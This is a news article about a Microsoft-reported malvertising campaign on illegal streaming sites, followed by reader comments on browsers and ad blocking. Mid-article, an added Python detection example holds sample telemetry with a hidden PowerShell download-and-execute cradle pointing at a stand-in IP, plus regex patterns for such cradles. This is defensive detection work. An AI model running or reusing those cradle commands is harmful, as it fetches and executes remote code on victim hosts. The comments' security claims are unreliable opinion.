Microsoft: nearly one million devices hit by malware spread through ads on illegal streaming websites

midian182

In brief: If you're going to visit websites that host pirated video streams, you'd better be willing to accept the risks. That's something the owners of the nearly one million devices affected by a malware campaign originating from these sites might not have considered.

Microsoft writes that its threat analysis team detected a large-scale malvertising campaign that impacted nearly one million devices globally in December 2024.

The company traced the attack back to two illegal streaming websites, movies7 and 0123movie, whose hosted videos had malvertising redirectors embedded in them. The redirectors generated pay-per-view or pay-per-click revenue from malvertising platforms and then routed visitors through one or two additional malicious redirectors.

Victims eventually landed on an intermediate site, such as a tech support scam page, which in turn redirected them to GitHub.

The GitHub repositories, which have since been taken down, hosted the first-stage malware, which deployed additional malicious files and scripts. Once a victim had downloaded and run it, the malware collected system information and deployed second-stage payloads that exfiltrated documents and data.

A third-stage PowerShell script then downloaded the NetSupport remote access trojan (RAT) from a command-and-control server and established persistence through the registry. The RAT could in turn deliver the Lumma information stealer or an updated version of the Doenerium infostealer.
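The chain described above (a PowerShell download cradle on a victim host followed shortly by a registry Run-key write for persistence) is the kind of sequence a detection engineer would correlate in endpoint telemetry. The following is an added example, not code from Microsoft or from the article: it parses a handful of constructed Sysmon-style events (process creation and registry value set) and flags hosts where a PowerShell process with a download cradle is followed, within a time window, by a write under a CurrentVersion\Run key. The host names, timestamps, the 198.51.100.7 address, the file names and the value names are all made up for the example; the cradle and Run-key patterns are generic, not indicators from Microsoft's report.

```python
import re
from collections import defaultdict
from typing import List, NamedTuple, Tuple

# Constructed sample telemetry (not real logs). One event per line:
#   host|epoch_seconds|event_id|image|detail
# event_id 1  = process create, detail = command line
# event_id 13 = registry value set, detail = target object
SAMPLE_EVENTS = r"""
WS01|1733961000|1|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -c "iex (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage3.ps1')"
WS01|1733961040|13|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater
WS02|1733961100|1|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -c "Get-ChildItem C:\Temp"
WS02|1733961200|13|C:\Program Files\Vendor\setup.exe|HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorAgent
WS03|1733962000|1|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -c "Invoke-WebRequest http://198.51.100.7/a.txt -OutFile C:\Temp\a.txt"
WS03|1733965000|13|C:\Windows\Temp\a.exe|HKCU\Software\Microsoft\Windows\CurrentVersion\Run\a
"""


class Event(NamedTuple):
    host: str
    ts: int
    event_id: int
    image: str
    detail: str


def parse_events(text: str) -> List[Event]:
    """Parse the pipe-delimited sample format. The command line may itself
    contain '|', so only the first four separators are split on."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        host, ts, eid, image, detail = line.split("|", 4)
        events.append(Event(host, int(ts), int(eid), image, detail))
    return events


# Common PowerShell download/execute primitives and encoded-command flag.
DOWNLOAD_CRADLE = re.compile(
    r"Invoke-WebRequest|\biwr\b|Net\.WebClient|DownloadString|DownloadFile|"
    r"Invoke-Expression|\biex\b|-enc(odedcommand)?\b",
    re.IGNORECASE,
)
# Autostart locations under HKLM/HKCU/HKU ...\CurrentVersion\Run and RunOnce.
RUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.IGNORECASE)


def is_powershell(image: str) -> bool:
    return image.lower().endswith(("powershell.exe", "pwsh.exe"))


def find_staged_chains(events: List[Event], window: int = 600) -> List[Tuple[str, int, int, str]]:
    """Return (host, cradle_ts, runkey_ts, runkey_path) for every Run-key write
    that follows a PowerShell download cradle on the same host within `window`
    seconds. A Run-key write on its own (e.g. a software installer) is not
    reported, which keeps the rule from firing on routine installs."""
    by_host = defaultdict(list)
    for e in events:
        by_host[e.host].append(e)

    hits = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e.ts)
        cradles = [
            e for e in evs
            if e.event_id == 1 and is_powershell(e.image) and DOWNLOAD_CRADLE.search(e.detail)
        ]
        for e in evs:
            if e.event_id != 13 or not RUN_KEY.search(e.detail):
                continue
            for c in cradles:
                if 0 <= e.ts - c.ts <= window:
                    hits.append((host, c.ts, e.ts, e.detail))
                    break
    return hits


if __name__ == "__main__":
    for host, cradle_ts, run_ts, path in find_staged_chains(parse_events(SAMPLE_EVENTS)):
        print(f"{host}: cradle at {cradle_ts}, Run-key write {run_ts - cradle_ts}s later -> {path}")
```

With the default ten-minute window only WS01 is reported: WS02 has a Run-key write but no download cradle, and WS03's persistence write lands fifty minutes after its cradle. Widening the window to an hour picks up WS03 as well; the trade-off between window size and false positives is the usual tuning knob for this kind of sequence rule.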

The malware also allowed attackers to spy on victims' browsing activity and even interact with an active browser, including Firefox, Chrome, and Edge.

The first-stage payloads were digitally signed with newly created certificates and bundled some legitimate files to disguise their true nature. A total of twelve different certificates were identified, all of which were later revoked.

While GitHub was the primary platform used in the delivery of these payloads, Microsoft also found one payload hosted on Discord and another on Dropbox. As with GitHub, the pages that hosted the malware on these platforms have been removed.

Microsoft writes that the campaign was indiscriminate, impacting both consumer and enterprise devices. It also notes that Microsoft Defender detects and flags the malware used in the attack.

Actually the headline should be 'Google's war on ad blockers via Manifest V3 is paying off: millions infected with malware through ads', since that's the gist of it. If you refuse to run Linux, this news is why you should at least exclusively use Firefox with uBlock Origin instead of Chrome or Edge or some other browser that still supports Manifest V2 and effective ad blocking.
 
Actually the headline should be 'Google's war on ad blockers via Manifest V3 is paying off: millions infected with malware through ads', since that's the gist of it. If you refuse to run Linux, this news is why you should at least exclusively use Firefox with uBlock Origin instead of Chrome or Edge or some other browser that still supports Manifest V2 and effective ad blocking.

A lot of people in the know say Firefox (Gecko engine) is less secure (more vulnerabilities), such as the GrapheneOS devs. I'd go with a source-available Chromium-based browser that still lets you run uBlock Origin if you need that, or you can still use basic uBlock, which only takes away customization. Especially now that Mozilla has shown their cards that they intend to make Firefox spyware. Personally I'm sticking with Brave for now. If they don't ever allow rewards to go to a self-hosted wallet, I'll probably switch to Ladybird when that comes out, but that's a few years away.
 
A lot of people in the know say Firefox (Gecko engine) is less secure (more vulnerabilities), such as the GrapheneOS devs. I'd go with a source-available Chromium-based browser that still lets you run uBlock Origin if you need that, or you can still use basic uBlock, which only takes away customization. Especially now that Mozilla has shown their cards that they intend to make Firefox spyware. Personally I'm sticking with Brave for now. If they don't ever allow rewards to go to a self-hosted wallet, I'll probably switch to Ladybird when that comes out, but that's a few years away.
The GrapheneOS devs also have a long history of attacking other projects and defending their own work with the fervor of a savior complex. Take what they say with a grain of salt.
 
What Microsoft conveniently left out is that this same malware and one of its derivatives spread through legit ad networks too, including those served by its own Bing.


Lovely sarcasm! You know they're not far from the truth though.
Exactly why I am never not blocking ads (and do not use Microsoft OS or software except as required for my job). Some say it's immoral. I say the ads themselves are immoral. This is a perfect example. Not only that, they are used for tracking and profiling you and various other nefarious activities. Need to make money? Not my problem, figure out another way instead of supporting a malicious and immoral industry.
 
The GrapheneOS devs also have a long history of attacking other projects and defending their own work with the fervor of a savior complex. Take what they say with a grain of salt.
Yeah, I've seen some non-people-friendly reactions from them in the past. I think they've chilled out recently. I've looked into other OSes and tried a couple and have now settled on GrapheneOS. I believe they are correct, but are simply rough around the edges when dealing with people. Many gifted people in technical fields are that way. Linus Torvalds is another example.
 
A lot of people in the know say Firefox (Gecko engine) is less secure (more vulnerabilities), such as the GrapheneOS Devs.
And a lot of people still think the world is flat and that the Sun orbits the Earth. People think a lot of brain-dead ideas are true.
 
And a lot of people still think the world is flat and that the Sun orbits the Earth. People think a lot of brain-dead ideas are true.
Fair enough, but I would hardly categorize the GrapheneOS devs with flat-earthers. They may be a bit in the weeds, worried about something that cannot be exploited in the real world. I don't know. I'm on the fence. Except I am off the fence for other reasons, notably their new TOS/Privacy policy. I can't say I've seen any reporting of major Firefox exploits in the wild in the recent past. (Their uber-paranoia is why I want them working on my OS, however.)
 
Fair enough, but I would hardly categorize the GrapheneOS devs with flat-earthers.
Maybe not, but that doesn't make them experts on what is and is not secure. If Firefox had ANY actual and real security vulnerabilities, the security community would be blowing their doors down about it. That isn't happening. Sure, there are some complainers, but there always are.

Firefox is THE most secure browser on Earth and by a fair margin. Chrome and Edge are not.

Except I am off the fence for other reasons, notably their new TOS/Privacy policy.
That is an example of people not understanding the purpose of the new TOS. Mozilla has been required to reword it as a way of covering their backside due to people trying to blame them and hold them liable for things browser USERS are doing, in addition to new laws going into effect that cover "certain" internet related "activities".

It's insane and brainless, but people are trying it and governments are doing it, so Mozilla had to adapt and change the language of their TOS. Anyone who doesn't understand this is ignorant to reality and the world we live in where everyone tries to blame everyone else for their brainless activities and governments try to hold uninvolved parties responsible for things they did not do.
 
Got Acronis True Image? Do you use a portable edition of Firefox? Got a good antivirus program? I have gotten a virus a few times (in 26 years of using computers) and also redirection problems in Firefox. But I have the above, so I can go back a day, two days, a week, in an hour or so. Problem solved.
 
Got Acronis True Image? Do you use a portable edition of Firefox? Got a good antivirus program? I have gotten a virus a few times (in 26 years of using computers) and also redirection problems in Firefox. But I have the above, so I can go back a day, two days, a week, in an hour or so. Problem solved.
What was that and who were you talking to?
 
That is an example of people not understanding the purpose of the new TOS. Mozilla has been required to reword it as a way of covering their backside due to people trying to blame them and hold them liable for things browser USERS are doing, in addition to new laws going into effect that cover "certain" internet related "activities".

It's insane and brainless, but people are trying it and governments are doing it, so Mozilla had to adapt and change the language of their TOS. Anyone who doesn't understand this is ignorant to reality and the world we live in where everyone tries to blame everyone else for their brainless activities and governments try to hold uninvolved parties responsible for things they did not do.
I hope you are right. Time will tell.
 
I hope you are right. Time will tell.
Read the new TOS for yourself.

And if someone thinks these new terms are anywhere close to the kind of invasiveness of Edge or Chrome, then they've missed something very important or they're just fanboying. People need to take time to research and understand things before knee jerk over-reacting.
 